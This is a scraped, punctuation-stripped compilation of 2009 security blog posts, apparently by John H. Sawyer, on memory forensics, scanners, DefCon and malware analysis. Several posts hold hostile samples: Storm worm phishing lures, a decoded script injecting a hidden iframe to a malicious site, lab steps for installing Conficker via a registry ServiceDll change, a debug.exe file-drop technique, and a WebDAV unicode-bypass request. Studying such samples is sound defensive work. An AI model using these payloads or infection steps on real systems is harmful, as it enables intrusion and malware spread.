http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2009-11-20 20:55:20 - John H. Sawyer : I've been testing the upcoming 42 release of the Nessus vulnerability scanner The new Flash-based web interface is awesome It runs smoother than the standalone client and has a great feature under the Reports section for comparing two scan results, which is great when you have a baseline to compare current results against The first link has two video, and the second shows the compare functionality I'll be posting additional notes and screenshots as I spend more time with the beta The Academy Pro has some excellent videos showing off the new features of Nessus 42 Viewing vulnerabilities with Nessus 42 beta Logout scanning with Nessus 42 beta Also, check out the GFI videos They're currently giving away free T-shirts to bloggers - http://www.secuobs.com/revue/news/163529.shtmlhttp://www.secuobs.com/revue/news/163529.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - This is from a post I had over at ForenisFocuscom I'm working on a presentation and was trying to come up with a list of all the useful process dumpers for Windows, so I did a little Googling and found my old post So, I stuck it here for my own future reference --------------------------------------------------------------------- Everyone already knows about dd for Windows from George M Garner so I won't discuss it any further Until, the tools like those developed in the 2005 DFRWS memory forensic challenge are released, dd memory images are only as useful as the strings you pull out of them There is some promising research from Mariusz Burdach who just spoke at BlackHat Federal 2006 on Finding Digital Evidence in Physical Memory His website is located at http forensicseccurenet but his documentation memory forensics is more up-to-date on the BlackHat Media Archives page The tools docs archive even has the Windows version of wmftexe which isn't on his webpage yet just the linux version of wmft is there Memdump was mentioned but there are at least two different versions for Windows that I know of The one mentioned previously by APsoft and another from the Metasploit project APsoft's memdump will do any or all of memory MEMDUMP 386 for DOS Version 200 - Release 15-Jun-2005 C Copyright 1993-2005 by APSoft http wwwtsscde All rights reserved Disassembly or decompilation prohibited This program dumps or copy any part of 4GB memory address space of your system For proper access to hardware registers, memory can be read with BYTE, WORD or Double WORD granularity Syntax MEMDUMP H D BWD Address ,Length F filenamenone B filename where H - Print this text D BWD Address ,Length - Dump number of memory bytes from specified linear as bytes DB , words DW or double words DD correspondingly F filename - Output file for the dump Default console Use F none to completely suppress dump B filename - Output file for the binary contents of memory Notes Both 'Address' and 'Length' can be expressed in hexadecimal format with '0x' prefix The 'Length' field can be also expressed in decimal Examples MEMDUMP DW 0x100000,0x100000 F 2ndMBdmp - dump second MB to file MEMDUMP DB 0x100000,128 - dump 128 Bytes to CON MEMDUMP D 0,0x100 F none B IntTBbin - copy INT table to file If dump or binary file exists, MEMDUMP unconditionally overrides it If you are using WORD or DWORD access 'Length' parameter should be multiple of 2 or 4 correspondingly Please remember that if the memory manager such as EMM386EXE is loaded, MEMDUMP will read linear address rather as physical address There is almost no help for the Metasploit memdump It dumps specific processes by giving it a PID and creates quite a few files that are to be analyzed with msfpescan The file names looks to be based on the section of memory it is pulled from Msfpescan is crashing on my Mac OS X box right now so can't show you the output but here is the syntax and sample of memdump running C y memdumpexe Usage y memdumpexe pid dump directory C y memdumpexe 2796 Creating dump directory2796 Attaching to 2796 Dumping segments Dump completed successfully, 49 segments Then, there is pmdump that also dumps processes pmdump 12 - c 2002, Arne Vidstrom arnevidstrom ntsecuritynu - http ntsecuritynu toolbox pmdump Usage pmdump - dumps the process memory contents to a file pmdump -list - lists all running processes and their PID's Microsoft has several versions of userdump but I think the latest is version 80 and is less than a month old As with Metasploits memdump, there is another tool that can read the dumped output Dumpcheck is that tool and is part of the debugging tools package For it to be most useful, you need the symbols, also User Mode Process Dumper Version 8028260 Copyright c 1999-2005 Microsoft Corp All rights reserved userdump -p Displays a list of running processes and process IDs userdump -k Dumps one process or processes that share an image binary file name -k optionally causes processes to be killed after being dumped is a decimal or 0x-prefixed hex process ID, or the base name and extension no path of the image file used to create a process is a legal Win32 file specification If not specified, dump files are generated in the current directory using a name based on the image file name userdump -m -k -d Same as above, except dumps multiple processes -d supplies the directory where the dumps will go The default is the current directory userdump -g -k -d Similar to above, except dumps Win32 GUI apps that appear hang userdump -I -d To change just in time debugger to UserDump This command will not actually start UserDump If you don't setup userdump, please copy userdumpexe to pourcentswindirpourcents system32 -d supplies the directory where the dumps will go The default is a current directory of the target process That's it that I can think of for now I will probably remember the other one or two tonight Hope all that helps give you some direction and a realization that there is no specific way to analyze memory, but quite a few people are interested and several smart people are doing some excellent research into the area IMAGE http://www.secuobs.com/revue/news/157775.shtmlhttp://www.secuobs.com/revue/news/157775.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Thank all of you for attending my presentation If you have any questions, please don't hesitate to e-mail me Here are links to many of the things I talked about and demonstrated along with several that I didn't have time to get to My Websites ----------------------------------- Personal Blog http wwwjohnhsawyercom Dark Reading Blog http wwwdarkreadingcom blogasp blog_sectionid 447 UF IT Security Team http infosecufledu Malware Analysis and Sandboxes ----------------------------------- VirusTotal submit files for analysis http wwwvirustotalcom CWSandbox - Behavior-based Malware Analysis http wwwcwsandboxorg Anubis Analyzing Unknown Binaries http analysisseclabtuwienacat indexphp Norman Sandbox http wwwnormancom microsites nsic Submit en Mandiant Red Curtain http wwwmandiantcom mrc PEiD http wwwsecretashellcom codomain peid pefile for you Python programmers http dkbzaorg pefilehtml Firefox Extensions and SpiderMonkey ----------------------------------- NoScript http noscriptnet User Agent Switcher http chrispederickcom work web-developer WebDeveloper http chrispederickcom work web-developer SpiderMonkey http wwwmozillaorg js spidermonkey Incident Response Tools more ----------------------------------- Sysinternals http wwwmicrosoftcom technet sysinternals defaultmspx autoruns, tcpview, filemon, regmon, process moniopenports, tor, process explorer, pstools Sysinternals Suite all tools in one download http wwwmicrosoftcom technet sysinternals Utilities SysinternalsSuitemspx DiamondCS http wwwdiamondcscomau consoletoolsphp cmdline, openports Wireshark - sniffer and protocol analzer formerly Ethereal http wwwwiresharkorg Helix - CD designed for incident response and forensics Linux Windows tools http wwwe-fensecom helix Some Security Blogs ----------------------------------- SANS Internet Storm Center http iscsansorg Windows Incident Response Harlan Carvey - event logs, registry and memory analysis more http windowsirblogspotcom int for ensic blog Andreas Schuster - event logs and memory analysis http computerforensikblogde en Centralizing Windows Event Logs ----------------------------------- Series of Posts on DarkReading about logs Log Central http wwwdarkreadingcom blogasp blog_sectionid 447 doc_id 132446 How to Centralize Windows Event Logs links to Snare and Lasso http wwwdarkreadingcom blogasp blog_sectionid 447 doc_id 132709 Watch Out for That Log http wwwdarkreadingcom blogasp blog_sectionid 447 doc_id 133005 Miscellaneous Links ----------------------------------- Metasploit Framework http frameworkmetasploitcom VMware Workstation for Linux Windows, Fusion for Mac, Server and Player are FREE http wwwvmwarecom IMAGE http://www.secuobs.com/revue/news/157774.shtmlhttp://www.secuobs.com/revue/news/157774.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Just when I think there's nothing new going on with Storm, in flies a few new e-mails This time it has similar content as before, but with the hook being a cute, crazy kitty cat Subject You have just received an ecard Body Check out the original Crazy Cat Card It is too funny for words http 75470217 Subject Check out your ecard Body Click here to view your laughing kitty card online http 741381191 Subject You've got a greeting just for you Body Please click here to view your Crazy Kitty Card Online http 99162220182 Here's a screenshot of the page IMAGE After looking at the source and downloading the Flash animation the cat , I used Flare to extract any scripts I found the the original file came from http wwwsuperlaughcom 1 catnipswf Both files were the same size but MD5's did not match movie 'catnipswf' flash 4, total frames 127, frame rate 12 fps, 360x450 px frame 1 ifFrameLoaded 4 gotoAndPlay 3 frame 2 gotoAndPlay 1 movieClip 5 button 7 on release getURL 'http wwwsuperlaughcom', '_top' movieClip 14 frame 125 gotoAndPlay 3 The links on the page all go to SuperLaughexe which was caught by 70pourcents of scan engines on Virus Total Obfuscated Javascript was found at the bottom just like some previous versions It looked to be the same exploits that have been being used on and off since I first started looking into Storm about a month or two ago Also, all the images, including the kitty Flash file, were sourced from the img directory but it did not allow browsing of directories IMAGE IMAGE http://www.secuobs.com/revue/news/157773.shtmlhttp://www.secuobs.com/revue/news/157773.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - for human stupidity Which is why Storm keeps spreading There is simply no excuse for people to continue infecting themselves I'd take a stab and antivirus companies but they simply can't keep up Until they all move to true behavioral-based detection, they won't be able to handle the flood of malware coming from the miscreants out there Today, Storm worm brings us a new attempt to infect people by getting them to believe that there's a new filesharing application called Krackin Great Below are samples of the e-mails, screenshots and the javascript exploits Subject re krackin is released Body New Sharing network goes live Check out Krackin here http xx904473 Subject re krackin is online Body Ok, last time I am sending you this linkman LOL write it down or soothing This is krackin http xx7485128 Subject man here is the link Body man here is the next huge sharing network It is friggin awesome Check it out http xx3724109 IMAGE Here's a text file of the javascript exploit code Handle with care IMAGE http://www.secuobs.com/revue/news/157772.shtmlhttp://www.secuobs.com/revue/news/157772.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Storm has been sending out pump and dump spam for quite a while with everything from plain text to images to zips Now, it's throwing MP3's at us Here are two files below So far, the subjects have been blank with Re or Fwd Of note, the X-Mailer is Microsoft Outlook Express 60028001106 but that varies with each new iteration of storm I've seen it claim to be Thunderbird in the past coolringtonemp3 firstdancemp3 IMAGE http://www.secuobs.com/revue/news/157771.shtmlhttp://www.secuobs.com/revue/news/157771.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Note to self sudo apt-get install libxrender1 libxt6 libxtst6 libx11-6 build-essential xinetd linux-headers-2622-14-server I've heard VMware is available from one of the repositories, but I've not tried it This is for installs from the downloaded tarball IMAGE http://www.secuobs.com/revue/news/157770.shtmlhttp://www.secuobs.com/revue/news/157770.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Ruby Module URI Escape I was doing some quick analysis of a page that had some obfuscated javascript with some URI encoded text Usually, I pull out the javascript and run it through SpiderMonkey or Didier Stephen's modified version to see what's going on Recently, Jordan and I were talking about CLI tools for doing encoding decoding of things in hex, URI, binary and similar So, I took this opportunity to figure out the Ruby for deobfuscating something like this eval unescape pourcents77pourcents69pourcents6epourcents64pourcents6fpourcents77pourcents2epourcents73pourcents74pourcents61pourcents74pourcents75pourcents73pourcents3dpourcents27pourcents44pourcents6fpourcents6e pourcents65pourcents27pourcents3bpourcents64pourcents6fpourcents63pourcents75pourcents6dpourcents65pourcents6epourcents74pourcents2epourcents77pourcents72pourcents69pourcents74pourcents65pourcents28pourcents27pourcents3cpourcents69pourcents66 pourcents72pourcents61pourcents6dpourcents65pourcents20pourcents6epourcents61pourcents6dpourcents65pourcents3dpourcents39pourcents61pourcents37pourcents62pourcents34pourcents37pourcents32pourcents32pourcents20pourcents73pourcents72pourcents63 pourcents3dpourcents5cpourcents27pourcents68pourcents74pourcents74pourcents70pourcents3apourcents2fpourcents2fpourcents69pourcents6cpourcents6fpourcents76pourcents65pourcents6dpourcents79pourcents6cpourcents6fpourcents76pourcents65pourcents73 pourcents2epourcents63pourcents6fpourcents6dpourcents2fpourcents74pourcents72pourcents61pourcents66pourcents66pourcents2epourcents70pourcents68pourcents70pourcents3fpourcents27pourcents2bpourcents4dpourcents61pourcents74pourcents68pourcents2e pourcents72pourcents6fpourcents75pourcents6epourcents64pourcents28pourcents4dpourcents61pourcents74pourcents68pourcents2epourcents72pourcents61pourcents6epourcents64pourcents6fpourcents6dpourcents28pourcents29pourcents2apourcents31pourcents35 pourcents32pourcents37pourcents36pourcents29pourcents2bpourcents27pourcents37pourcents61pourcents33pourcents62pourcents36pourcents38pourcents30pourcents39pourcents66pourcents38pourcents5cpourcents27pourcents20pourcents77pourcents69pourcents64 pourcents74pourcents68pourcents3dpourcents32pourcents30pourcents31pourcents20pourcents68pourcents65pourcents69pourcents67pourcents68pourcents74pourcents3dpourcents37pourcents36pourcents20pourcents73pourcents74pourcents79pourcents6cpourcents65 pourcents3dpourcents5cpourcents27pourcents64pourcents69pourcents73pourcents70pourcents6cpourcents61pourcents79pourcents3apourcents20pourcents6epourcents6fpourcents6epourcents65pourcents5cpourcents27pourcents3epourcents3cpourcents2fpourcents69 pourcents66pourcents72pourcents61pourcents6dpourcents65pourcents3epourcents27pourcents29 Which this ruby -e 'require uri p URIunescape ltjunk_from_above ' Returns this windowstatus 'Done' documentwrite ' ltiframe name 9a7b4722 src 'http ilovemylovescom traffphp ' Mathround Mathrandom 15276 '7a3b6809f8 ' width 201 height 76 style 'display none '' IMAGE http://www.secuobs.com/revue/news/157769.shtmlhttp://www.secuobs.com/revue/news/157769.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - These settings go into System Preferences under the Network area You have to add a Bluetooth device and pair the phone with modem If you don't know how, read the forum post that got me this far The forum works great with Tiger but did not work with Leopard I had to make changes to the Advanced area to get it to work properly Username PHONE_NUMBER vzw3com not sure how important this is, I've done it with the BlackBerry Internet Server username also Password vzw Telephone 777 Advanced button Vendor Generic Model Dialup Device Leave the rest as defaults IMAGE http://www.secuobs.com/revue/news/157768.shtmlhttp://www.secuobs.com/revue/news/157768.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Storm Nuwar, CME711, etc just reminded me that Valentine's is less than a month away I've gotten four recycled e-mails looking to spread some love When I first got the copies, only two AV vendors NOD32v2 Webwasher-Gateway on VirusTotalcom were detecting it as malicious Subject Our Love is Free Body When Love Comes Knocking http 69212483 Subject I Love Thee Body Words in my Heart http 241116187 Subject A Is For Attitude Body A Dream is a Wish http 22210737211 Subject Eternity of Your Love Body The Moon Stars http 6857210178 The webpage contains some URL encoded text that links to with_loveexe 'pourcents3Cpourcents61pourcents20pourcents68pourcents72pourcents65pourcents66pourcents3Dpourcents22pourcents77pourcents69pourcents74pourcents68pourcents6Cpourcents6Fpourcents76pourcents65pourcents2Epourcents65pourcents78pourcents65pourcents22pourcents3Epourcents0Dpourcents0A' IMAGE IMAGE http://www.secuobs.com/revue/news/157767.shtmlhttp://www.secuobs.com/revue/news/157767.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I figured I'd better put this up before I keep having more ideas of how to improve it and never end up posting it What is it Just over a month ago, a buddy who's recently begun working for a BIG company that just happens to do some pentesting was telling me about a pentest where they weren't allowed to upload software so he had to write something in a batch file While we were chatting, I began telling him of the different ways I've seen attackers put files on Windows systems tftp, ftp with without scripts , wget-like VBscript and echo While echo was integral in most of the above techniques ftp script VBscript , I'd seen a handful of hacks back in 2005 where an attacker used echo and pasted hex into a file When the file was complete, he ran debug 123hex Renamed the resulting file to end with exe and his tool was complete After digging through some really old incidents I'd investigated, I found some real world examples of the technique used during compromises A little bit of Google-ing revealed these two links to a forum post describing the technique in 2004 and mention in a Phrack article After sitting in on part of Ed Skoudis' new Security 560 Penetration Testing class, I saw that his class didn't mention this technique but it covered just about all the others above Since I would one day like to be efficient at writing ruby, I wrote exe2hexrb based on the C code from Riftor Currently, due to a limitation in Microsoft's debugexe, files must be smaller than 65,280 bytes My next version will automatically split up files to be under the correct size and convert each one to hex Once echo'd and converted on the target host, the individual files can be joined with copy file1 file2 file3 b dest b or at least it should work that wayneed to do more testing Where does this tool come in handyI have some ideas but they'll have to wait I need to pack things up here in the lab and head home IMAGE http://www.secuobs.com/revue/news/157766.shtmlhttp://www.secuobs.com/revue/news/157766.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I won't bother going into any detail about the Capture the Flag competition here You can read my blog entry over at Dark Reading or tlas' blog for more information about our 3rd place finish and sk3wl 0f r00t's well-deserved victory I did have an awesome time as I've had in the previous years when we won, learned a great deal from all aspects of the CTF experience and truly enjoyed spending time with my friends and teammates from the 1 stplace What else did I do while in Vegas for DefCon Thurs night, I finally met Tim and Kelly from Dark Reading in person for a fantastic time chatting and eating at the Mesa Grill in Caesar's Palace They've been my editors for a year, now, and I'd never actually met them We really had a great time Afterwards, Kelly and I went by the Core Security party where we met their new CEO, Mark Hatton, Ivan Arce, Matt Hines, several other Core employees along with Rich Mogull and Mike Rothman I picked up a couple of their Core Exploit Black Hat Edition card game but haven't had a chance to play it yet Afterwards, Kelly tried to get me into the Microsoft partyFAIL FridayCTFthen Plato's room to work on CTF stuff until 2 30am SaturdayCTFthen Plato's room to work on CTF stuff until 2 30am Note if you talk to any of my teammates, they'll tell you I did take a couple small naps during the late nights and won the quickest to fall asleep award along with answering a few questions while sleepingquestions that weren't asked to me SundayCTFbut, then, I went to the Hardware Hacking Village and soldered on a USB port so I could so some badge hacking after I returned home Next, I went to the first presentation I've ever seen at a DefCon conference Why the first one you ask Because CTF takes up the entire weekend So, the presentation was Stealing the Internet An Internet-Scale Man in the Middle Attack It was pretty cool I admit that I don't know much about BGP so I probably thought this was way cooler than some other people but the room was packed The sweetest part of the presentation was that they had hijacked the DefCon network at the Riviera and had been routing through and collecting all the passing traffic through their colocation company in NY Wicked Sunday nightthe DC16 Awards Ceremony was so packed and I knew we didn't win that I decided to head off to dinner with Greg We ate at an awesome Koren BBQ restaurant and headed down the strip to relax We wound up at Casa Fuente where we had a few mojitos and smoked some nice Ashton cigars Afterwards, we walked the strip and made our way back to the Riviera where Greg had to get a little gambling out of his system MondayI spent the day in airports and on airplanes heading home DefCon 16 rocked Thank you to all my friends that I was able to see again, my brothers-in-arms from 1 stplace, Kenshoto for a great game and the DC16 organizers See you next year I'll post my pics soon IMAGE http://www.secuobs.com/revue/news/157765.shtmlhttp://www.secuobs.com/revue/news/157765.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - At DefCon 16, I finally got to see some of the other things going on other than CTF I didn't see much but the thing that really left its mark was the Hardware Hacking Village Greg and I went up there and I saw about 30 geeks or more going at it with soldering irons, miscellaneous computer scraps and DC16 badges It was a cool site Greg had already been up there before and soldered a USB port onto his badge I'd tried soldering a couple of times in my lifetime and failed pretty badly This time, I was careful, asked for advice from experienced hardware hackers and was able to successfully solder on a working USB port What a rush I'm totally hooked and have bought a couple of soldering irons electric and butane to work on modding all of my badges DC 14-16 I've got a JTAG programmer at the office somewhere that I'm going to have to dig up to work on the previous badges, I think The thing I really want to build is a RFID cloner The simplest, but most effective one I've found so far is the one from Chris Paget of IOActive but his BlackHat presentation with info on building it was squashed - Oh well, I'll keep searching for something that will work It may come down to having a separate reader and transmitter writer I don't really care too much as long as it is portable so I can use it during physical pentests As if I needed another obsession IMAGE http://www.secuobs.com/revue/news/157764.shtmlhttp://www.secuobs.com/revue/news/157764.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I was working on an exploit last week that was having a problem At one point, I thought it might have been the shellcode I was using so I started looking for some old C code I had for testing to make sure shellcode actually ran Nowhere to be found, I turned to Google and found the following blog that had C code and an interesting usage for it to analyze shellcode seen in malicious websites The author extracted the shellcode from the page and put it in this C code, compiled it and ran it through Ollydbg for analysis SIDE NOTE Immunity has released an updated, more powerful version of Olly as the free Immunity Debugger While the author did all this on Windows, the C code works fine on other operating systems For example, I was working with it on FreeBSD and had no problems IMAGE http://www.secuobs.com/revue/news/157763.shtmlhttp://www.secuobs.com/revue/news/157763.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - People reversing the vulnerable code have discovered that the new MS08-067 vulnerability was present right next to the MS06-040 vulnerable code but was never noticed Interesting Are we really supposed to believe that noone noticed this sooner other than the recent malware being blamed for it being outed Alright, enough conspiracy theory There's an exploit for MS08-067 recently posted at Milw0rm that I was testing out tonight Out of sheer curiosity, I uploaded the precompiled binary to VirusTotal and it had already been uploaded so there was an analysis waiting on me The previous analysis showed 8 out 36 AV engines detecting it Now, there's 9 What I thought was most interesting is this eTrust-Vet 3166176 20081028 Win32 MS06-040 exploit That seems pretty darn close to me Since the source is available for the exploit, I'll leave it to someone to dig up the old source of exploits for MS06-040 and see if there was some code sharing between the two or if the similarity of the vulnerability is causing eTrust to identify it this way IMAGE http://www.secuobs.com/revue/news/157762.shtmlhttp://www.secuobs.com/revue/news/157762.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I'm checking out the new series My Own Worst Enemy with Christian Slater In episode two around the 40 minute mark, they are being briefed on how they are going to infiltrate the enemy's headquarters Someone mentions that the computers will be encrypted and a geeky dude says no problem, this can right here will freeze the memory so you can extract the encryption keys Amazing When they get in, one of the guys is seen opening the side of a computer, briefly spraying the can into the machine, pulling out a RAM chip with tweezers and putting it into some sort of small circuit board that is then analyzed by a small subnotebook Pretty cool stuff I'm very impressed, at lease after seeing all the technological crap the show 24 has butchered IMAGE http://www.secuobs.com/revue/news/157761.shtmlhttp://www.secuobs.com/revue/news/157761.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Short disclaimer This post is primarily for the sake of posterity and keeping track of some of the stuff I had laying around to get where I am in the research I'm doing right now I've done a lot more testing with physical memory acquisition using winen, mdd, win32dd, and Encase both locally on live systems and on remote systems using F-Response in an effort to see the compatibility of the different outputs with Encase memory analysis Enscripts, Volatility Framework and Memoryze I don't remember which version of Encase added physical and process memory support but it was the 611 release that included winenexe, a standalone utility to create an image dump of physical memory The resulting file was, of course, in the EWF E01 format The interesting thing is that when the E01's containing memory are opened in Encase, it knows that they represent memory so the icon in Encase changes from usual hard drive icon to a memory chip Here's a screenshot How does Encase know I thought it was based on the following dialog and I'd be able to change this within Encase by right-clicking on an entry but modifying the entries like those in the following image did nothing It turns out that Guidance Software has made an addition to the E01 file so that there is a new media type identifier, 0x10 Taking at look at a memory image created by winen, ewfinfo from the libefw project shows the Media Type as RAM ewfinfo 20080609 libewf 20080609, zlib 123, libcrypto 097 Acquiry information Case number AAAAAAAAAAAA Description winen-nocomp Examiner name BBBBBBBBBBBB Evidence number CCCCCCCCCCCC Operating system used Windows XP Software version used 611 Password N A Unknown value ext 0 Media information Media type RAM Media is physical yes Amount of sectors 130940 Bytes per sector 4096 Media size 511 MiB 536330240 bytes Error granularity 1 Compression type no compression GUID 837687b1-988d-2c44-a8f4-84874692842a MD5 hash in file 26b6d584f7289baeecb64a79adc6f60b Note Latter beta versions since 20080609 lost the LIBEWF_MEDIA_TYPE_RAM so they show up like this ewfinfo 20081013 libewf 20081013, libuna 20081011, zlib 123, libcrypto 097 Acquiry information Case number AAAAAAAAAAAA Description winen-nocomp Examiner name BBBBBBBBBBBB Evidence number CCCCCCCCCCCC Operating system used Windows XP Software version used 611 Password N A Unknown value ext 0 Media information Media type unknown 0x10 Media is physical yes Amount of sectors 130940 Bytes per sector 4096 Media size 511 MiB 536330240 bytes Error granularity 1 Compression type no compression GUID 837687b1-988d-2c44-a8f4-84874692842a MD5 hash in file 26b6d584f7289baeecb64a79adc6f60b Winen is great for incident response and gathering memory from live systems, but you can also access physical memory and individual processes on the same machine you're running Encase on, it's as easy as clicking the related boxes on the Add Device dialog in Encase Documentation on EWF E01 File Format IMAGE http://www.secuobs.com/revue/news/157760.shtmlhttp://www.secuobs.com/revue/news/157760.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I've had my new iPod for a week now and am loving it Email is great and now I'm testing out a blogging app that seems to work well so far My favorite app so far is ByLine that syncs my Google Reader RSS feeds so I can read them offline making it easy to stay on top of them Ok, test over More cool memory forensic stuff to come IMAGE http://www.secuobs.com/revue/news/157759.shtmlhttp://www.secuobs.com/revue/news/157759.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Here's a quick wish list for anyone who is still stumped on what to get me I did put down gift certificates for two of the sites, but that's because it would be impossible to list all the little items from each site I'm interested in like a Super TV-B-Gone kit, DIY Design Electronics Kit, Mousebot Kit, Blinkybug Kit, Tiny Cylon Kit, USB7 6 Digit LED Display Kit, Solarspeeder Kit, Learn to Solder Kit, Maker Bundle 1, Bare Bones Aduino Board Kit, Subscription to MAKE Magazine 3495 Wizzywig Volume 1 PHREAK Wizzywig Volume 2 HACKER Gift Certificate to MakerSHED Gift Certificate to adafruit industries IMAGE http://www.secuobs.com/revue/news/157758.shtmlhttp://www.secuobs.com/revue/news/157758.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - It's kind of interesting how I start out to write something and it ends up being totally different from what I was planning Today's post at Dark Reading was like that My original intent was to focus on data sprawl due to proliferation of physically small, large storage capacity flash drives What I ended up with was a bad ass idea of weaponizing the Addonics NAS Adapter into a MitM attack tool for scarfing up network data including VoIP calls Take a trip down the rabbit hole with USB Flash Drive Network Weaponization BTW, here's a link to the PDF of Larry Pesce's Rogue APs for Penetration Testers presentation He's my inspiration for hiding small electronic devices in obscure places IMAGE http://www.secuobs.com/revue/news/157757.shtmlhttp://www.secuobs.com/revue/news/157757.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I put together a comprehensive list of Windows physical memory tools that's posted over at the SANS Computer Forensics Blog The list includes acquisition and analysis tools along with a brief description, whether it is free or commercial and screenshots if available Take a look if you have an interest in Windows memory analysis Windows Physical Memory Finding the Right Tool for the Job IMAGE http://www.secuobs.com/revue/news/157756.shtmlhttp://www.secuobs.com/revue/news/157756.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I'd been wanting to do some testing with Conficker to see if my IDS rules were truly working and whether or not some of the new detection tools released Monday were accurate DarkReading Conficker DetectionLet Me Count The Ways Knowing that just running an EXE wasn't all that easy based on some of the analysis from the Internet Storm Center here and here , I started digging around for some good samples of Conficker and instructions First, I grabbed a few samples from Offensive Computing's malware archive Next, I went looking for some hints on the best way to load the samples and found a related thread on Offensive Computing where someone was looking for a ConfickerC sample So, here's the quick and dirty We'll download the sample, rename it, copy it to system32 dir and edit a useless service to load it on startup 1 Grab the file here 2 Rename it to booyahdll 3 Copy booyahdll to C Windows System32 4 Open Regedit and navigate to HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Nla Parameters 5 Right click on ServiceDll , click Modify , change the current DLL to point to booyahdll , and click OK 6 Close Regedit and Reboot Now, your machine is infected To verify, go to some sites like McAfee and SecureWorks that are blocked, or try out the Conficker Eye Chart What's next If you've done malware analysis before, you know you should have been capturing ALL network traffic from this host Continue sniffing and looking for interesting things Capture all of the traffic to disk with tcpdump, tshark or daemonlogger Then run it through Snort with the Emerging Threats ruleset or ngrep looking for interesting strings The possibilities are endless Oh yeah, don't forget to put this behind some kind of firewall or filtering device so you can keep a handle on it I've got mine sitting behind a Vyatta-based bridging firewall that is working quite well for this use I'm also sniffing directly on the bridged interface IMAGE http://www.secuobs.com/revue/news/157755.shtmlhttp://www.secuobs.com/revue/news/157755.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - On Tuesday, I received a package in the mail from Matt Shannon, founder and creator of F-Response Inside was a small, F-Response-branded USB thumb drive containing the upcoming release of F-Response due out April 15, 2009 I updated my dongle, installed the new license manager and was ready to begin testing One of the first things I noticed is the newly redesigned license manager to replace the NetUnikey Server Thank you, thank you, thank you The third-party NetUnikey Server for dongle authentication in previous releases sucked, and I even ran into some bizarre network issues where it wouldn't authenticate in version 118 but was fine in the 2x betas Now, that's all fixed and working great For those of you unfamiliar with the product, their is a licensing dongle In the Field Kit edition, it has to be plugged into the host you are examining In the Consultant and Enterprise editions, the dongle can be plugged into the analyst's workstation When the F-Response client runs on the host being analyzed, it first must authenticate to the workstation with the dongle in it It was the NetUnikey Server that used to accept and authenticate the requests from the F-Response clients Now, it's gone and the F-Response License Manager serves that purpose in version 309 The next major feature addition is the inclusion of the new management interfaces in the Enterprise and Consultant editions They make deployment and connecting to remote disks a piece of cake The Enterprise Management Console allows you to push the F-Response enterprise service to hosts you have admin rights to, start the service and connect to the disks and memory The Consultant Connector makes it easy to connect to disks from hosts on which the Consultant F-Response client is running There are several videos over at the F-Response site if you want to see them in action linked to by their names above The Enterprise Management Console will definitely be a head turner for companies who have been looking to replace products like Encase Enterprise but weren't sure if F-Response was the solution It's about time to take a another look if you're one of those groups For me, the most exciting new features were the inclusion of support for Mac OS X and Linux in the Enterprise and Consultant versions Previously, support for those OS's were only on the Field Kit edition So far, F-Response has been working flawlessly on Mac and Linux Earlier this week, I witnessed two Mac OS X machines have their entire 200 GB hard drives images over the network with F-Response I personally tested a Mac Book Pro with the latest version of OS X, a fully updated Ubuntu Linux system and a Windows XP SP3 system In this screenshot, you can see the different options available in the Mac OS X client I created an autoconfigure ini file using the Windows F-Response client, which has a GUI interface where you enter the IP of the host with the dongle and the user credentials to connect back into the machine over iSCSI As you can see in this screenshot, I ran the executable with the -c option followed by the autoconfigure file I had created from the Windows client The F-Response client authenticated, mounted the available drives and started listening for connections via iSCSI Did you notice how there were two drives in the last screenshot that were mounted read-only What's worth noting is that this is my MacBook Pro which only has one hard drive I use FileVault for encrypting my Home directory The second drive is my Home directory mounted I know one of the big features in Windows was the ability to access disk Volumes and not just raw hard drives, but I was surprised to see this behavior I haven't tested imaging the mounted Home directory via F-Response, yet, but should be interesting This next screenshot is of the Linux F-Response client It's pretty much identical to the Mac version and works with the same autoconfigure file as both Windows and Linux This is a great feature allowing you to create CDs to hand out to your help desk with all versions of the client and only one ini This next screenshot is FTK Imager connected to a Linux host While I was testing, I only looked around the filesystem a bit, but I could have easily imaged the drive I think one of the things I like about F-Response the most is the flexibility it gives me to use pretty much any forensic tool I want whether it's FTK, Encase, RegRipper or anything else It really lives up to its slogan by extending your arsenal IMAGE http://www.secuobs.com/revue/news/157754.shtmlhttp://www.secuobs.com/revue/news/157754.shtml Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I covered this a bit in my DarkReading blog but wanted to continue with my testing tonight to see what else I could find out Plus, there are some new tool updates such as an auxiliary module for Metasploit and a plugin for Nessus There was an interesting follow-up to the DR blog on whether or not Microsoft Outlook Web Access was vulnerable I don't have hands-on access to an OWA box but I hope to do some more testing on Tues What prompted me to write this post was an interesting finding posed in the correspondence regarding the logs and why the Unicode isn't showing up The reader was wondering why the Unicode attacks were not showing up Let's start first with some example logs right after what my telnet test looks like followed by my speculation as to the answer metasploit jsawyer telnet 19216843128 80 Trying 19216843128 Connected to 19216843128 Escape character is ' ' GET pourcentsc0pourcentsaf admin testtxt HTTP 11 Translate f Connection close Host 19216843128 HTTP 11 200 OK Connection close Date Tue, 19 May 2009 04 42 20 GMT Server 